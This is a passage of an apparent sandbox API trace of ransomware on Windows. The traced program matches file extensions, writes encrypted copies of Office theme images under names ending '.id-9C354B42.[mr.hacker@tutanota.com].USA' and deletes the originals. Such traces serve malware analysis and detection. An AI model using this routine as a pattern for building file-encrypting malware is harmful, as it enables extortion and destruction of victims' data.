(lpString=".ppt") returned 4 [0047.276] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.276] lstrlenW (lpString=".zip") returned 4 [0047.276] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.276] lstrlenW (lpString=".rar") returned 4 [0047.276] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.276] lstrlenW (lpString=".bz2") returned 4 [0047.276] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.276] lstrlenW (lpString=".7z") returned 3 [0047.276] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.276] lstrlenW (lpString=".dbf") returned 4 [0047.276] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.276] lstrlenW (lpString=".1cd") returned 4 [0047.276] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.276] lstrlenW (lpString=".jpg") returned 4 [0047.276] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.276] lstrlenW (lpString=".doc") returned 4 [0047.276] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.277] lstrlenW (lpString=".docx") returned 5 [0047.277] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.277] lstrlenW (lpString=".pdf") returned 4 [0047.277] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.277] lstrlenW (lpString=".xls") returned 4 [0047.277] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.277] lstrlenW (lpString=".xlsx") returned 5 [0047.277] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.277] lstrlenW (lpString=".ppt") returned 4 [0047.277] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.277] lstrlenW (lpString=".zip") returned 4 [0047.277] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.277] lstrlenW (lpString=".rar") returned 4 [0047.277] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.277] lstrlenW (lpString=".bz2") returned 4 [0047.277] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.277] lstrlenW (lpString=".7z") returned 3 [0047.277] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.277] lstrlenW (lpString=".dbf") returned 4 [0047.277] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.277] lstrlenW (lpString=".1cd") returned 4 [0047.277] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.277] lstrlenW (lpString=".jpg") returned 4 [0047.277] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.277] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0047.277] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.278] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1423) returned 1 [0047.278] CloseHandle (hObject=0x210) returned 1 [0047.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 0x20 [0047.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.278] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.278] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.278] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.278] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.417] GetLastError () returned 0x0 [0047.417] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x58f, lpOverlapped=0x0) returned 1 [0047.424] WriteFile (in: hFile=0x1f4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x590, lpOverlapped=0x0) returned 1 [0047.424] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.425] WriteFile (in: hFile=0x1f4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.425] SetEndOfFile (hFile=0x1f4) returned 1 [0047.425] CloseHandle (hObject=0x1f4) returned 1 [0047.425] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.425] SetEndOfFile (hFile=0x210) returned 1 [0047.426] CloseHandle (hObject=0x210) returned 1 [0047.426] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.426] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 1 [0047.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.426] lstrlenW (lpString=".doc") returned 4 [0047.426] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.426] lstrlenW (lpString=".docx") returned 5 [0047.426] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.426] lstrlenW (lpString=".pdf") returned 4 [0047.426] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.426] lstrlenW (lpString=".xls") returned 4 [0047.426] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.426] lstrlenW (lpString=".xlsx") returned 5 [0047.426] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.426] lstrlenW (lpString=".ppt") returned 4 [0047.426] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.426] lstrlenW (lpString=".zip") returned 4 [0047.426] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.427] lstrlenW (lpString=".rar") returned 4 [0047.427] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.427] lstrlenW (lpString=".bz2") returned 4 [0047.427] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.427] lstrlenW (lpString=".7z") returned 3 [0047.427] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.427] lstrlenW (lpString=".dbf") returned 4 [0047.427] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.427] lstrlenW (lpString=".1cd") returned 4 [0047.427] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.427] lstrlenW (lpString=".jpg") returned 4 [0047.427] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.427] lstrlenW (lpString=".doc") returned 4 [0047.427] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.427] lstrlenW (lpString=".docx") returned 5 [0047.427] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.427] lstrlenW (lpString=".pdf") returned 4 [0047.427] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.427] lstrlenW (lpString=".xls") returned 4 [0047.427] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.427] lstrlenW (lpString=".xlsx") returned 5 [0047.427] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.427] lstrlenW (lpString=".ppt") returned 4 [0047.427] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.427] lstrlenW (lpString=".zip") returned 4 [0047.427] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.427] lstrlenW (lpString=".rar") returned 4 [0047.427] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.427] lstrlenW (lpString=".bz2") returned 4 [0047.427] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.427] lstrlenW (lpString=".7z") returned 3 [0047.428] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.428] lstrlenW (lpString=".dbf") returned 4 [0047.428] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.428] lstrlenW (lpString=".1cd") returned 4 [0047.428] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0047.428] lstrlenW (lpString=".jpg") returned 4 [0047.428] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.428] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0047.428] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.428] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.428] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2604) returned 1 [0047.428] CloseHandle (hObject=0x210) returned 1 [0047.428] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 0x20 [0047.428] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.429] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.429] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.429] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.429] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0048.527] GetLastError () returned 0x0 [0048.527] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xa2c, lpOverlapped=0x0) returned 1 [0048.549] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xa30, lpOverlapped=0x0) returned 1 [0048.550] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.550] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.550] SetEndOfFile (hFile=0x220) returned 1 [0048.550] CloseHandle (hObject=0x220) returned 1 [0048.550] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.550] SetEndOfFile (hFile=0x210) returned 1 [0048.551] CloseHandle (hObject=0x210) returned 1 [0048.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.551] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 1 [0048.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.552] lstrlenW (lpString=".doc") returned 4 [0048.552] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.552] lstrlenW (lpString=".docx") returned 5 [0048.552] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.552] lstrlenW (lpString=".pdf") returned 4 [0048.552] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.552] lstrlenW (lpString=".xls") returned 4 [0048.552] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.552] lstrlenW (lpString=".xlsx") returned 5 [0048.552] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.552] lstrlenW (lpString=".ppt") returned 4 [0048.552] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.552] lstrlenW (lpString=".zip") returned 4 [0048.552] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.552] lstrlenW (lpString=".rar") returned 4 [0048.552] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.552] lstrlenW (lpString=".bz2") returned 4 [0048.552] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.552] lstrlenW (lpString=".7z") returned 3 [0048.552] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.552] lstrlenW (lpString=".dbf") returned 4 [0048.552] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.552] lstrlenW (lpString=".1cd") returned 4 [0048.552] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.552] lstrlenW (lpString=".jpg") returned 4 [0048.552] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.553] lstrlenW (lpString=".doc") returned 4 [0048.553] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.553] lstrlenW (lpString=".docx") returned 5 [0048.553] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.553] lstrlenW (lpString=".pdf") returned 4 [0048.553] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.553] lstrlenW (lpString=".xls") returned 4 [0048.553] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.553] lstrlenW (lpString=".xlsx") returned 5 [0048.553] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.553] lstrlenW (lpString=".ppt") returned 4 [0048.553] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.553] lstrlenW (lpString=".zip") returned 4 [0048.553] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.553] lstrlenW (lpString=".rar") returned 4 [0048.553] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.553] lstrlenW (lpString=".bz2") returned 4 [0048.553] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.553] lstrlenW (lpString=".7z") returned 3 [0048.553] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.553] lstrlenW (lpString=".dbf") returned 4 [0048.553] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.553] lstrlenW (lpString=".1cd") returned 4 [0048.553] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.553] lstrlenW (lpString=".jpg") returned 4 [0048.553] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.553] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0048.554] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.554] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=21812) returned 1 [0048.554] CloseHandle (hObject=0x210) returned 1 [0048.554] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 0x20 [0048.554] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.554] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.554] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0048.555] GetLastError () returned 0x0 [0048.555] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x5534, lpOverlapped=0x0) returned 1 [0048.556] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x5540, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x5540, lpOverlapped=0x0) returned 1 [0048.558] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.558] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.558] SetEndOfFile (hFile=0x220) returned 1 [0048.558] CloseHandle (hObject=0x220) returned 1 [0048.558] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.558] SetEndOfFile (hFile=0x210) returned 1 [0048.559] CloseHandle (hObject=0x210) returned 1 [0048.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.559] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 1 [0048.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.559] lstrlenW (lpString=".doc") returned 4 [0048.559] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.559] lstrlenW (lpString=".docx") returned 5 [0048.559] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.559] lstrlenW (lpString=".pdf") returned 4 [0048.559] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.559] lstrlenW (lpString=".xls") returned 4 [0048.559] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.559] lstrlenW (lpString=".xlsx") returned 5 [0048.559] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.559] lstrlenW (lpString=".ppt") returned 4 [0048.560] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 